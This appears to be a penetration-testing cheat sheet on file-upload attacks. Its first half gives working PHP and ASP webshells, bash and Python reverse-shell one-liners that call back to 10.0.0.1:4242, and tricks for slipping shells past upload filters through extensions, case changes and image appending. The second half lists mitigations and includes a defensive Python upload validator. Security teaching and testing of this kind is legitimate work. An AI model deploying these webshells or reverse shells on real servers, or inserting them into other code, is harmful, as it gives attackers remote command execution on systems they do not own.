File Uploads

Ways to upload files to a server for backdoor or RCE purposes

Basic Webshell Uploads

PHP RCE

<?php system('hostname'); ?>

PHP Webshell

<?php system($_REQUEST['cmd']); ?>

ASP Web Shell

<% eval request('cmd') %>

Basic Reverse shells

Bash TCP

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Python3

import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Extension Bypassing

Uncommon extensions (can be fuzzed)

shell.phtml

Case Manipulation

Double Extension / Reverse Double Extension

Shells in Images

Create an empty image with

Upload the image, intercept the request with Burp Suite, and append the shell at the end of the file.

Checks are typically done on:

  • Extension names

  • Content types

  • MIME types

Play around with those to find a bypass.

SVG files and XXE

An SVG file is XML, so an upload feature that parses SVG can be chained with XXE vulnerabilities.

Mitigations

  • Extension Validation

  • Content Type Validation

  • MIME Type Validation

  • Prevent upload path disclosure
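As an added example (not part of the original page), a server-side validator in Python that applies these mitigations against the bypasses listed above: allowlisted extensions checked case-insensitively on the whole suffix chain, magic-byte sniffing instead of trusting the client's Content-Type, rejection of bytes appended after an image's end marker, and a random storage name so the upload path is never derived from the client filename. The allowlist and magic-byte table are assumptions chosen for the example.

```python
import os
import secrets
from typing import Optional

# Allowlist of accepted extensions and the magic bytes each must begin with.
# Constructed for this example; tune to what the application actually needs.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Expected trailer for each type, so a payload appended after the image is refused.
TRAILER = {
    "png": b"IEND\xaeB`\x82",
    "jpg": b"\xff\xd9",
    "jpeg": b"\xff\xd9",
    "gif": b"\x3b",
}


def validate_upload(filename: str, data: bytes) -> Optional[str]:
    """Return a random storage name for an accepted upload, or None if rejected.

    The client's Content-Type header is deliberately ignored: it is attacker
    controlled, so only the bytes and an allowlisted extension are trusted.
    """
    base = os.path.basename(filename)          # drop any directory components
    parts = base.lower().split(".")            # lower-case defeats case tricks
    if len(parts) != 2 or parts[0] == "":
        return None  # no extension, dotfile, or double extension (x.php.png)
    ext = parts[1]
    if ext not in ALLOWED:
        return None  # .php, .phtml, .svg and every other non-allowlisted suffix
    if not data.startswith(ALLOWED[ext]):
        return None  # header does not match the claimed image type
    if not data.endswith(TRAILER[ext]):
        return None  # bytes after the end marker: the appended-shell trick
    # Note: this catches a payload appended after the image, as described above;
    # data hidden inside a valid chunk needs re-encoding through an image library.
    # Never reuse the client name; a random name also blocks path guessing.
    return f"{secrets.token_hex(16)}.{ext}"
```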
